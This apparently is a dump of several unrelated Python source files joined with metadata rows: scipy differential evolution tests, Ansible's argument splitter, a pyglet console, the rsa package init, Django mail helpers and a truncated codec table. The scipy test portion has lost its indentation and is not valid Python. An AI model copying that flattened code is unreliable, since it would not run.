Unit tests for the differential evolution global minimization algorithm.
"""
from scipy.optimize import _differentialevolution
from scipy.optimize._differentialevolution import DifferentialEvolutionSolver
from scipy.optimize import differential_evolution
import numpy as np
from scipy.optimize import rosen
from numpy.testing import (assert_equal, TestCase, assert_allclose,
run_module_suite, assert_almost_equal,
assert_string_equal, assert_raises, assert_)
class TestDifferentialEvolutionSolver(TestCase):
def setUp(self):
self.old_seterr = np.seterr(invalid='raise')
self.limits = np.array([[0., 0.],
[2., 2.]])
self.bounds = [(0., 2.), (0., 2.)]
self.dummy_solver = DifferentialEvolutionSolver(self.quadratic,
[(0, 100)])
# dummy_solver2 will be used to test mutation strategies
self.dummy_solver2 = DifferentialEvolutionSolver(self.quadratic,
[(0, 1)],
popsize=7,
mutation=0.5)
# create a population that's only 7 members long
# [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7]
population = np.atleast_2d(np.arange(0.1, 0.8, 0.1)).T
self.dummy_solver2.population = population
def tearDown(self):
np.seterr(**self.old_seterr)
def quadratic(self, x):
return x[0]**2
def test__strategy_resolves(self):
# test that the correct mutation function is resolved by
# different requested strategy arguments
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='best1exp')
assert_equal(solver.strategy, 'best1exp')
assert_equal(solver.mutation_func.__name__, '_best1')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='best1bin')
assert_equal(solver.strategy, 'best1bin')
assert_equal(solver.mutation_func.__name__, '_best1')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='rand1bin')
assert_equal(solver.strategy, 'rand1bin')
assert_equal(solver.mutation_func.__name__, '_rand1')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='rand1exp')
assert_equal(solver.strategy, 'rand1exp')
assert_equal(solver.mutation_func.__name__, '_rand1')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='rand2exp')
assert_equal(solver.strategy, 'rand2exp')
assert_equal(solver.mutation_func.__name__, '_rand2')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='best2bin')
assert_equal(solver.strategy, 'best2bin')
assert_equal(solver.mutation_func.__name__, '_best2')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='rand2bin')
assert_equal(solver.strategy, 'rand2bin')
assert_equal(solver.mutation_func.__name__, '_rand2')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='rand2exp')
assert_equal(solver.strategy, 'rand2exp')
assert_equal(solver.mutation_func.__name__, '_rand2')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='randtobest1bin')
assert_equal(solver.strategy, 'randtobest1bin')
assert_equal(solver.mutation_func.__name__, '_randtobest1')
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='randtobest1exp')
assert_equal(solver.strategy, 'randtobest1exp')
assert_equal(solver.mutation_func.__name__, '_randtobest1')
def test__mutate1(self):
# strategies */1/*, i.e. rand/1/bin, best/1/exp, etc.
result = np.array([0.05])
trial = self.dummy_solver2._best1((2, 3, 4, 5, 6))
assert_allclose(trial, result)
result = np.array([0.25])
trial = self.dummy_solver2._rand1((2, 3, 4, 5, 6))
assert_allclose(trial, result)
def test__mutate2(self):
# strategies */2/*, i.e. rand/2/bin, best/2/exp, etc.
# [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7]
result = np.array([-0.1])
trial = self.dummy_solver2._best2((2, 3, 4, 5, 6))
assert_allclose(trial, result)
result = np.array([0.1])
trial = self.dummy_solver2._rand2((2, 3, 4, 5, 6))
assert_allclose(trial, result)
def test__randtobest1(self):
# strategies randtobest/1/*
result = np.array([0.1])
trial = self.dummy_solver2._randtobest1(1, (2, 3, 4, 5, 6))
assert_allclose(trial, result)
def test_can_init_with_dithering(self):
mutation = (0.5, 1)
solver = DifferentialEvolutionSolver(self.quadratic,
self.bounds,
mutation=mutation)
self.assertEqual(solver.dither, list(mutation))
def test_invalid_mutation_values_arent_accepted(self):
func = rosen
mutation = (0.5, 3)
self.assertRaises(ValueError,
DifferentialEvolutionSolver,
func,
self.bounds,
mutation=mutation)
mutation = (-1, 1)
self.assertRaises(ValueError,
DifferentialEvolutionSolver,
func,
self.bounds,
mutation=mutation)
mutation = (0.1, np.nan)
self.assertRaises(ValueError,
DifferentialEvolutionSolver,
func,
self.bounds,
mutation=mutation)
mutation = 0.5
solver = DifferentialEvolutionSolver(func,
self.bounds,
mutation=mutation)
assert_equal(0.5, solver.scale)
assert_equal(None, solver.dither)
def test__scale_parameters(self):
trial = np.array([0.3])
assert_equal(30, self.dummy_solver._scale_parameters(trial))
# it should also work with the limits reversed
self.dummy_solver.limits = np.array([[100], [0.]])
assert_equal(30, self.dummy_solver._scale_parameters(trial))
def test__unscale_parameters(self):
trial = np.array([30])
assert_equal(0.3, self.dummy_solver._unscale_parameters(trial))
# it should also work with the limits reversed
self.dummy_solver.limits = np.array([[100], [0.]])
assert_equal(0.3, self.dummy_solver._unscale_parameters(trial))
def test__ensure_constraint(self):
trial = np.array([1.1, -100, 2., 300., -0.00001])
self.dummy_solver._ensure_constraint(trial)
assert_equal(np.all(trial <= 1), True)
def test_differential_evolution(self):
# test that the Jmin of DifferentialEvolutionSolver
# is the same as the function evaluation
solver = DifferentialEvolutionSolver(self.quadratic, [(-2, 2)])
result = solver.solve()
assert_almost_equal(result.fun, self.quadratic(result.x))
def test_best_solution_retrieval(self):
# test that the getter property method for the best solution works.
solver = DifferentialEvolutionSolver(self.quadratic, [(-2, 2)])
result = solver.solve()
assert_equal(result.x, solver.x)
def test_callback_terminates(self):
# test that if the callback returns true, then the minimization halts
bounds = [(0, 2), (0, 2)]
def callback(param, convergence=0.):
return True
result = differential_evolution(rosen, bounds, callback=callback)
assert_string_equal(result.message,
'callback function requested stop early '
'by returning True')
def test_args_tuple_is_passed(self):
# test that the args tuple is passed to the cost function properly.
bounds = [(-10, 10)]
args = (1., 2., 3.)
def quadratic(x, *args):
if type(args) != tuple:
raise ValueError('args should be a tuple')
return args[0] + args[1] * x + args[2] * x**2.
result = differential_evolution(quadratic,
bounds,
args=args,
polish=True)
assert_almost_equal(result.fun, 2 / 3.)
def test_init_with_invalid_strategy(self):
# test that passing an invalid strategy raises ValueError
func = rosen
bounds = [(-3, 3)]
self.assertRaises(ValueError,
differential_evolution,
func,
bounds,
strategy='abc')
def test_bounds_checking(self):
# test that the bounds checking works
func = rosen
bounds = [(-3, None)]
self.assertRaises(ValueError,
differential_evolution,
func,
bounds)
bounds = [(-3)]
self.assertRaises(ValueError,
differential_evolution,
func,
bounds)
bounds = [(-3, 3), (3, 4, 5)]
self.assertRaises(ValueError,
differential_evolution,
func,
bounds)
def test_select_samples(self):
# select_samples should return 5 separate random numbers.
limits = np.arange(12., dtype='float64').reshape(2, 6)
bounds = list(zip(limits[0, :], limits[1, :]))
solver = DifferentialEvolutionSolver(None, bounds, popsize=1)
candidate = 0
r1, r2, r3, r4, r5 = solver._select_samples(candidate, 5)
assert_equal(
len(np.unique(np.array([candidate, r1, r2, r3, r4, r5]))), 6)
def test_maxiter_stops_solve(self):
# test that if the maximum number of iterations is exceeded
# the solver stops.
solver = DifferentialEvolutionSolver(rosen, self.bounds, maxiter=1)
result = solver.solve()
assert_equal(result.success, False)
assert_equal(result.message,
'Maximum number of iterations has been exceeded.')
def test_maxfun_stops_solve(self):
# test that if the maximum number of function evaluations is exceeded
# during initialisation the solver stops
solver = DifferentialEvolutionSolver(rosen, self.bounds, maxfun=1,
polish=False)
result = solver.solve()
assert_equal(result.nfev, 2)
assert_equal(result.success, False)
assert_equal(result.message,
'Maximum number of function evaluations has '
'been exceeded.')
# test that if the maximum number of function evaluations is exceeded
# during the actual minimisation, then the solver stops.
# Have to turn polishing off, as this will still occur even if maxfun
# is reached. For popsize=5 and len(bounds)=2, then there are only 10
# function evaluations during initialisation.
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
popsize=5,
polish=False,
maxfun=40)
result = solver.solve()
assert_equal(result.nfev, 41)
assert_equal(result.success, False)
assert_equal(result.message,
'Maximum number of function evaluations has '
'been exceeded.')
def test_quadratic(self):
# test the quadratic function from object
solver = DifferentialEvolutionSolver(self.quadratic,
[(-100, 100)],
tol=0.02)
solver.solve()
assert_equal(np.argmin(solver.population_energies), 0)
def test_quadratic_from_diff_ev(self):
# test the quadratic function from differential_evolution function
differential_evolution(self.quadratic,
[(-100, 100)],
tol=0.02)
def test_seed_gives_repeatability(self):
result = differential_evolution(self.quadratic,
[(-100, 100)],
polish=False,
seed=1,
tol=0.5)
result2 = differential_evolution(self.quadratic,
[(-100, 100)],
polish=False,
seed=1,
tol=0.5)
assert_equal(result.x, result2.x)
def test_exp_runs(self):
# test whether exponential mutation loop runs
solver = DifferentialEvolutionSolver(rosen,
self.bounds,
strategy='best1exp',
maxiter=1)
solver.solve()
def test__make_random_gen(self):
# If seed is None, return the RandomState singleton used by np.random.
# If seed is an int, return a new RandomState instance seeded with seed.
# If seed is already a RandomState instance, return it.
# Otherwise raise ValueError.
rsi = _differentialevolution._make_random_gen(1)
assert_equal(type(rsi), np.random.RandomState)
rsi = _differentialevolution._make_random_gen(rsi)
assert_equal(type(rsi), np.random.RandomState)
rsi = _differentialevolution._make_random_gen(None)
assert_equal(type(rsi), np.random.RandomState)
self.assertRaises(
ValueError, _differentialevolution._make_random_gen, 'a')
def test_gh_4511_regression(self):
# This modification of the differential evolution docstring example
# uses a custom popsize that had triggered an off-by-one error.
# Because we do not care about solving the optimization problem in
# this test, we use maxiter=1 to reduce the testing time.
bounds = [(-5, 5), (-5, 5)]
result = differential_evolution(rosen, bounds, popsize=1815, maxiter=1)
def test_calculate_population_energies(self):
# if popsize is 2 then the overall generation has size (4,)
solver = DifferentialEvolutionSolver(rosen, self.bounds, popsize=2)
solver._calculate_population_energies()
assert_equal(np.argmin(solver.population_energies), 0)
# initial calculation of the energies should require 4 nfev.
assert_equal(solver._nfev, 4)
def test_iteration(self):
# test that DifferentialEvolutionSolver is iterable
# if popsize is 2 then the overall generation has size (4,)
solver = DifferentialEvolutionSolver(rosen, self.bounds, popsize=2,
maxfun=8)
x, fun = next(solver)
assert_equal(np.size(x, 0), 2)
# 4 nfev are required for initial calculation of energies, 4 nfev are
# required for the evolution of the 4 population members.
assert_equal(solver._nfev, 8)
# the next generation should halt because it exceeds maxfun
assert_raises(StopIteration, next, solver)
# check a proper minimisation can be done by an iterable solver
solver = DifferentialEvolutionSolver(rosen, self.bounds)
for i, soln in enumerate(solver):
x_current, fun_current = soln
# need to have this otherwise the solver would never stop.
if i == 1000:
break
assert_almost_equal(fun_current, 0)
def test_convergence(self):
solver = DifferentialEvolutionSolver(rosen, self.bounds, tol=0.2,
polish=False)
solver.solve()
assert_(solver.convergence < 0.2)
if __name__ == '__main__':
run_module_suite()
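# Illustrative sketch (demo only, not one of the unit tests above): the
# public entry point exercised throughout this file. The bounds are the same
# ones test_gh_4511_regression uses; seed is fixed purely for repeatability.
def _example_minimise_rosen():
    """Minimise the Rosenbrock function over [-5, 5]^2 (demo only)."""
    result = differential_evolution(rosen, [(-5, 5), (-5, 5)], seed=1)
    return result.x, result.fun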
| bsd-3-clause | -8,830,625,670,992,213,000 | 41.072639 | 80 | 0.53102 | false |
GheRivero/ansible | lib/ansible/parsing/splitter.py | 49 | 10682 | # (c) 2014 James Cammarata, <jcammarata@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import codecs
import re
from ansible.errors import AnsibleParserError
from ansible.module_utils._text import to_text
from ansible.parsing.quoting import unquote
# Decode escapes adapted from rspeer's answer here:
# http://stackoverflow.com/questions/4020539/process-escape-sequences-in-a-string-in-python
_HEXCHAR = '[a-fA-F0-9]'
_ESCAPE_SEQUENCE_RE = re.compile(r'''
( \\U{0} # 8-digit hex escapes
| \\u{1} # 4-digit hex escapes
| \\x{2} # 2-digit hex escapes
| \\N\{{[^}}]+\}} # Unicode characters by name
| \\[\\'"abfnrtv] # Single-character escapes
)'''.format(_HEXCHAR * 8, _HEXCHAR * 4, _HEXCHAR * 2), re.UNICODE | re.VERBOSE)
def _decode_escapes(s):
def decode_match(match):
return codecs.decode(match.group(0), 'unicode-escape')
return _ESCAPE_SEQUENCE_RE.sub(decode_match, s)
def parse_kv(args, check_raw=False):
'''
Convert a string of key/value items to a dict. If any free-form params
are found and the check_raw option is set to True, they will be added
to a new parameter called '_raw_params'. If check_raw is not enabled,
they will simply be ignored.
'''
args = to_text(args, nonstring='passthru')
options = {}
if args is not None:
try:
vargs = split_args(args)
except ValueError as ve:
if 'no closing quotation' in str(ve).lower():
raise AnsibleParserError("error parsing argument string, try quoting the entire line.", orig_exc=ve)
else:
raise
raw_params = []
for orig_x in vargs:
x = _decode_escapes(orig_x)
if "=" in x:
pos = 0
try:
while True:
pos = x.index('=', pos + 1)
if pos > 0 and x[pos - 1] != '\\':
break
except ValueError:
# ran out of string, but we must have some escaped equals,
# so replace those and append this to the list of raw params
raw_params.append(x.replace('\\=', '='))
continue
k = x[:pos]
v = x[pos + 1:]
# FIXME: make the retrieval of this list of shell/command
# options a function, so the list is centralized
if check_raw and k not in ('creates', 'removes', 'chdir', 'executable', 'warn'):
raw_params.append(orig_x)
else:
options[k.strip()] = unquote(v.strip())
else:
raw_params.append(orig_x)
# recombine the free-form params, if any were found, and assign
# them to a special option for use later by the shell/command module
if len(raw_params) > 0:
options[u'_raw_params'] = ' '.join(raw_params)
return options
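# Illustrative sketch of parse_kv() (demo only; the sample strings are
# hypothetical). Bare words are always gathered under '_raw_params'; the
# check_raw flag additionally routes key=value tokens whose key is not one
# of the whitelisted shell options ('creates', 'chdir', ...) into it.
def _example_parse_kv():
    """Parse shell-style argument strings (demo only)."""
    simple = parse_kv(u'chdir=/tmp state=present')
    # {'chdir': u'/tmp', 'state': u'present'}
    raw = parse_kv(u'chdir=/tmp echo FOO=bar', check_raw=True)
    # {'chdir': u'/tmp', '_raw_params': u'echo FOO=bar'}
    return simple, raw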
def _get_quote_state(token, quote_char):
'''
the goal of this block is to determine if the quoted string
is unterminated in which case it needs to be put back together
'''
# the char before the current one, used to see if
# the current character is escaped
prev_char = None
for idx, cur_char in enumerate(token):
if idx > 0:
prev_char = token[idx - 1]
if cur_char in '"\'' and prev_char != '\\':
if quote_char:
if cur_char == quote_char:
quote_char = None
else:
quote_char = cur_char
return quote_char
def _count_jinja2_blocks(token, cur_depth, open_token, close_token):
'''
this function counts the number of opening/closing blocks for a
given opening/closing type and adjusts the current depth for that
block based on the difference
'''
num_open = token.count(open_token)
num_close = token.count(close_token)
if num_open != num_close:
cur_depth += (num_open - num_close)
if cur_depth < 0:
cur_depth = 0
return cur_depth
def split_args(args):
'''
Splits args on whitespace, but intelligently reassembles
those that may have been split over a jinja2 block or quotes.
When used in a remote module, we won't ever have to be concerned about
jinja2 blocks, however this function is/will be used in the
core portions as well before the args are templated.
example input: a=b c="foo bar"
example output: ['a=b', 'c="foo bar"']
Basically this is a variation of shlex that has some more intelligence for
how Ansible needs to use it.
'''
# the list of params parsed out of the arg string
# this is going to be the result value when we are done
params = []
# Initial split on white space
args = args.strip()
items = args.strip().split('\n')
# iterate over the tokens, and reassemble any that may have been
# split on a space inside a jinja2 block.
# ex if tokens are "{{", "foo", "}}" these go together
# These variables are used
# to keep track of the state of the parsing, since blocks and quotes
# may be nested within each other.
quote_char = None
inside_quotes = False
print_depth = 0 # used to count nested jinja2 {{ }} blocks
block_depth = 0 # used to count nested jinja2 {% %} blocks
comment_depth = 0 # used to count nested jinja2 {# #} blocks
# now we loop over each split chunk, coalescing tokens if the white space
# split occurred within quotes or a jinja2 block of some kind
for (itemidx, item) in enumerate(items):
# we split on spaces and newlines separately, so that we
# can tell which character we split on for reassembly
# inside quotation characters
tokens = item.strip().split(' ')
line_continuation = False
for (idx, token) in enumerate(tokens):
# if we hit a line continuation character, but
# we're not inside quotes, ignore it and continue
# on to the next token while setting a flag
if token == '\\' and not inside_quotes:
line_continuation = True
continue
# store the previous quoting state for checking later
was_inside_quotes = inside_quotes
quote_char = _get_quote_state(token, quote_char)
inside_quotes = quote_char is not None
# multiple conditions may append a token to the list of params,
# so we keep track with this flag to make sure it only happens once
# append means add to the end of the list, don't append means concatenate
# it to the end of the last token
appended = False
# if we're inside quotes now, but weren't before, append the token
# to the end of the list, since we'll tack on more to it later
# otherwise, if we're inside any jinja2 block, inside quotes, or we were
# inside quotes (but aren't now) concat this token to the last param
if inside_quotes and not was_inside_quotes and not(print_depth or block_depth or comment_depth):
params.append(token)
appended = True
elif print_depth or block_depth or comment_depth or inside_quotes or was_inside_quotes:
if idx == 0 and was_inside_quotes:
params[-1] = "%s%s" % (params[-1], token)
elif len(tokens) > 1:
spacer = ''
if idx > 0:
spacer = ' '
params[-1] = "%s%s%s" % (params[-1], spacer, token)
else:
params[-1] = "%s\n%s" % (params[-1], token)
appended = True
# if the number of paired block tags is not the same, the depth has changed, so we calculate that here
# and may append the current token to the params (if we haven't previously done so)
prev_print_depth = print_depth
print_depth = _count_jinja2_blocks(token, print_depth, "{{", "}}")
if print_depth != prev_print_depth and not appended:
params.append(token)
appended = True
prev_block_depth = block_depth
block_depth = _count_jinja2_blocks(token, block_depth, "{%", "%}")
if block_depth != prev_block_depth and not appended:
params.append(token)
appended = True
prev_comment_depth = comment_depth
comment_depth = _count_jinja2_blocks(token, comment_depth, "{#", "#}")
if comment_depth != prev_comment_depth and not appended:
params.append(token)
appended = True
# finally, if we're at zero depth for all blocks and not inside quotes, and have not
# yet appended anything to the list of params, we do so now
if not (print_depth or block_depth or comment_depth) and not inside_quotes and not appended and token != '':
params.append(token)
# if this was the last token in the list, and we have more than
# one item (meaning we split on newlines), add a newline back here
# to preserve the original structure
if len(items) > 1 and itemidx != len(items) - 1 and not line_continuation:
params[-1] += '\n'
# always clear the line continuation flag
line_continuation = False
# If we're done and things are not at zero depth or we're still inside quotes,
# raise an error to indicate that the args were unbalanced
if print_depth or block_depth or comment_depth or inside_quotes:
raise AnsibleParserError(u"failed at splitting arguments, either an unbalanced jinja2 block or quotes: {0}".format(args))
return params
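# Illustrative sketch of split_args() (demo only): whitespace inside quotes
# and inside jinja2 blocks does not split tokens, matching the docstring
# example above.
def _example_split_args():
    """Split argument strings while respecting quotes and {{ }} blocks (demo only)."""
    quoted = split_args(u'a=b c="foo bar"')                 # ['a=b', 'c="foo bar"']
    templated = split_args(u'msg={{ greeting | upper }}')   # one single token
    return quoted, templated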
| gpl-3.0 | -1,751,901,497,148,542,000 | 39.157895 | 129 | 0.599232 | false |
seeminglee/pyglet64 | experimental/console.py | 29 | 3991 | #!/usr/bin/env python
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import code
import sys
import traceback
import pyglet.event
import pyglet.text
from pyglet.window import key
from pyglet.gl import *
class Console(object):
def __init__(self, width, height, globals=None, locals=None):
self.font = pyglet.text.default_font_factory.get_font('bitstream vera sans mono', 12)
self.lines = []
self.buffer = ''
self.pre_buffer = ''
self.prompt = '>>> '
self.prompt2 = '... '
self.globals = globals
self.locals = locals
self.write_pending = ''
self.width, self.height = (width, height)
self.max_lines = self.height / self.font.glyph_height - 1
self.write('pyglet command console\n')
self.write('Version %s\n' % __version__)
def on_key_press(self, symbol, modifiers):
# TODO cursor control / line editing
if modifiers & key.MOD_CTRL and symbol == key.C:
self.buffer = ''
self.pre_buffer = ''
return
if symbol == key.ENTER:
self.write('%s%s\n' % (self.get_prompt(), self.buffer))
self.execute(self.pre_buffer + self.buffer)
self.buffer = ''
return
if symbol == key.BACKSPACE:
self.buffer = self.buffer[:-1]
return
return pyglet.event.EVENT_UNHANDLED
def on_text(self, text):
if ' ' <= text <= '~':
self.buffer += text
if 0xae <= ord(text) <= 0xff:
self.buffer += text
def write(self, text):
if self.write_pending:
text = self.write_pending + text
self.write_pending = ''
if type(text) in (str, unicode):
text = text.split('\n')
if text[-1] != '':
self.write_pending = text[-1]
del text[-1]
self.lines = [pyglet.text.layout_text(line.strip(), font=self.font)
for line in text] + self.lines
if len(self.lines) > self.max_lines:
del self.lines[-1]
def execute(self, input):
old_stderr, old_stdout = sys.stderr, sys.stdout
sys.stderr = sys.stdout = self
try:
c = code.compile_command(input, '<pyglet console>')
if c is None:
self.pre_buffer = '%s\n' % input
else:
self.pre_buffer = ''
result = eval(c, self.globals, self.locals)
if result is not None:
self.write('%r\n' % result)
except:
traceback.print_exc()
self.pre_buffer = ''
sys.stderr = old_stderr
sys.stdout = old_stdout
def get_prompt(self):
if self.pre_buffer:
return self.prompt2
return self.prompt
__last = None
def draw(self):
pyglet.text.begin()
glPushMatrix()
glTranslatef(0, self.height, 0)
for line in self.lines[::-1]:
line.draw()
glTranslatef(0, -self.font.glyph_height, 0)
line = self.get_prompt() + self.buffer
if self.__last is None or line != self.__last[0]:
self.__last = (line, pyglet.text.layout_text(line.strip(),
font=self.font))
self.__last[1].draw()
glPopMatrix()
pyglet.text.end()
if __name__ == '__main__':
from pyglet.window import *
from pyglet.window.event import *
from pyglet import clock
w1 = Window(width=600, height=400)
console = Console(w1.width, w1.height)
w1.push_handlers(console)
c = clock.Clock()
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glOrtho(0, w1.width, 0, w1.height, -1, 1)
glEnable(GL_COLOR_MATERIAL)
glMatrixMode(GL_MODELVIEW)
glClearColor(1, 1, 1, 1)
while not w1.has_exit:
c.set_fps(60)
w1.dispatch_events()
glClear(GL_COLOR_BUFFER_BIT)
console.draw()
w1.flip()
| bsd-3-clause | 6,713,850,565,843,153,000 | 27.304965 | 93 | 0.541468 | false |
javier-ruiz-b/docker-rasppi-images | raspberry-google-home/env/lib/python3.7/site-packages/rsa/__init__.py | 1 | 1542 | # Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""RSA module
Module for calculating large primes, and RSA encryption, decryption, signing
and verification. Includes generating public and private keys.
WARNING: this implementation does not use compression of the cleartext input to
prevent repetitions, or other common security improvements. Use with care.
"""
from rsa.key import newkeys, PrivateKey, PublicKey
from rsa.pkcs1 import encrypt, decrypt, sign, verify, DecryptionError, \
VerificationError, find_signature_hash, sign_hash, compute_hash
__author__ = "Sybren Stuvel, Barry Mead and Yesudeep Mangalapilly"
__date__ = '2020-06-12'
__version__ = '4.6'
# Do doctest if we're run directly
if __name__ == "__main__":
import doctest
doctest.testmod()
__all__ = ["newkeys", "encrypt", "decrypt", "sign", "verify", 'PublicKey',
'PrivateKey', 'DecryptionError', 'VerificationError',
'find_signature_hash', 'compute_hash', 'sign_hash']
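# Illustrative sketch (demo only) of the round trips described in the module
# docstring. 512-bit keys are far too small for real use and are chosen here
# only to keep the demo fast.
def _example_roundtrip():
    """Encrypt/decrypt and sign/verify a short message (demo only)."""
    pub_key, priv_key = newkeys(512)
    message = b'hello'
    assert decrypt(encrypt(message, pub_key), priv_key) == message
    signature = sign(message, priv_key, 'SHA-256')
    # verify() returns the name of the hash method used (rsa >= 4.0).
    assert verify(message, signature, pub_key) == 'SHA-256'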
| apache-2.0 | 2,662,950,397,415,766,500 | 37.525 | 79 | 0.726152 | false |
BitWriters/Zenith_project | zango/lib/python3.5/site-packages/django/core/mail/__init__.py | 230 | 4701 | """
Tools for sending email.
"""
from __future__ import unicode_literals
from django.conf import settings
from django.utils.module_loading import import_string
# Imported for backwards compatibility, and for the sake
# of a cleaner namespace. These symbols used to be in
# django/core/mail.py before the introduction of email
# backends and the subsequent reorganization (See #10355)
from django.core.mail.utils import CachedDnsName, DNS_NAME
from django.core.mail.message import (
EmailMessage, EmailMultiAlternatives,
SafeMIMEText, SafeMIMEMultipart,
DEFAULT_ATTACHMENT_MIME_TYPE, make_msgid,
BadHeaderError, forbid_multi_line_headers)
__all__ = [
'CachedDnsName', 'DNS_NAME', 'EmailMessage', 'EmailMultiAlternatives',
'SafeMIMEText', 'SafeMIMEMultipart', 'DEFAULT_ATTACHMENT_MIME_TYPE',
'make_msgid', 'BadHeaderError', 'forbid_multi_line_headers',
'get_connection', 'send_mail', 'send_mass_mail', 'mail_admins',
'mail_managers',
]
def get_connection(backend=None, fail_silently=False, **kwds):
"""Load an email backend and return an instance of it.
If backend is None (default) settings.EMAIL_BACKEND is used.
Both fail_silently and other keyword arguments are used in the
constructor of the backend.
"""
klass = import_string(backend or settings.EMAIL_BACKEND)
return klass(fail_silently=fail_silently, **kwds)
def send_mail(subject, message, from_email, recipient_list,
fail_silently=False, auth_user=None, auth_password=None,
connection=None, html_message=None):
"""
Easy wrapper for sending a single message to a recipient list. All members
of the recipient list will see the other recipients in the 'To' field.
If auth_user is None, the EMAIL_HOST_USER setting is used.
If auth_password is None, the EMAIL_HOST_PASSWORD setting is used.
Note: The API for this method is frozen. New code wanting to extend the
functionality should use the EmailMessage class directly.
"""
connection = connection or get_connection(username=auth_user,
password=auth_password,
fail_silently=fail_silently)
mail = EmailMultiAlternatives(subject, message, from_email, recipient_list,
connection=connection)
if html_message:
mail.attach_alternative(html_message, 'text/html')
return mail.send()
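# Illustrative sketch: one call covering the common send_mail() options above.
# The addresses are hypothetical placeholders.
def _example_send_mail():
    """Send a plain-text message with an HTML alternative (demo only)."""
    return send_mail(
        'Subject here', 'Plain-text body.', 'from@example.com',
        ['to@example.com'], fail_silently=False,
        html_message='<p>HTML body.</p>')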
def send_mass_mail(datatuple, fail_silently=False, auth_user=None,
auth_password=None, connection=None):
"""
Given a datatuple of (subject, message, from_email, recipient_list), sends
each message to each recipient list. Returns the number of emails sent.
If from_email is None, the DEFAULT_FROM_EMAIL setting is used.
If auth_user and auth_password are set, they're used to log in.
If auth_user is None, the EMAIL_HOST_USER setting is used.
If auth_password is None, the EMAIL_HOST_PASSWORD setting is used.
Note: The API for this method is frozen. New code wanting to extend the
functionality should use the EmailMessage class directly.
"""
connection = connection or get_connection(username=auth_user,
password=auth_password,
fail_silently=fail_silently)
messages = [EmailMessage(subject, message, sender, recipient,
connection=connection)
for subject, message, sender, recipient in datatuple]
return connection.send_messages(messages)
def mail_admins(subject, message, fail_silently=False, connection=None,
html_message=None):
"""Sends a message to the admins, as defined by the ADMINS setting."""
if not settings.ADMINS:
return
mail = EmailMultiAlternatives('%s%s' % (settings.EMAIL_SUBJECT_PREFIX, subject),
message, settings.SERVER_EMAIL, [a[1] for a in settings.ADMINS],
connection=connection)
if html_message:
mail.attach_alternative(html_message, 'text/html')
mail.send(fail_silently=fail_silently)
def mail_managers(subject, message, fail_silently=False, connection=None,
html_message=None):
"""Sends a message to the managers, as defined by the MANAGERS setting."""
if not settings.MANAGERS:
return
mail = EmailMultiAlternatives('%s%s' % (settings.EMAIL_SUBJECT_PREFIX, subject),
message, settings.SERVER_EMAIL, [a[1] for a in settings.MANAGERS],
connection=connection)
if html_message:
mail.attach_alternative(html_message, 'text/html')
mail.send(fail_silently=fail_silently)
| mit | -3,802,460,343,842,118,700 | 41.351351 | 84 | 0.677941 | false |
sdphome/UHF_Reader | rfs/rootfs/usr/lib/python2.7/encodings/mac_iceland.py | 593 | 13754 | """ Python Character Mapping Codec mac_iceland generated from 'MAPPINGS/VENDORS/APPLE/ICELAND.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='mac-iceland',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> CONTROL CHARACTER
u'\x01' # 0x01 -> CONTROL CHARACTER
u'\x02' # 0x02 -> CONTROL CHARACTER
u'\x03' # 0x03 -> CONTROL CHARACTER
u'\x04' # 0x04 -> CONTROL CHARACTER
u'\x05' # 0x05 -> CONTROL CHARACTER
u'\x06' # 0x06 -> CONTROL CHARACTER
u'\x07' # 0x07 -> CONTROL CHARACTER
u'\x08' # 0x08 -> CONTROL CHARACTER
u'\t' # 0x09 -> CONTROL CHARACTER
u'\n' # 0x0A -> CONTROL CHARACTER
u'\x0b' # 0x0B -> CONTROL CHARACTER
u'\x0c' # 0x0C -> CONTROL CHARACTER
u'\r' # 0x0D -> CONTROL CHARACTER
u'\x0e' # 0x0E -> CONTROL CHARACTER
u'\x0f' # 0x0F -> CONTROL CHARACTER
u'\x10' # 0x10 -> CONTROL CHARACTER
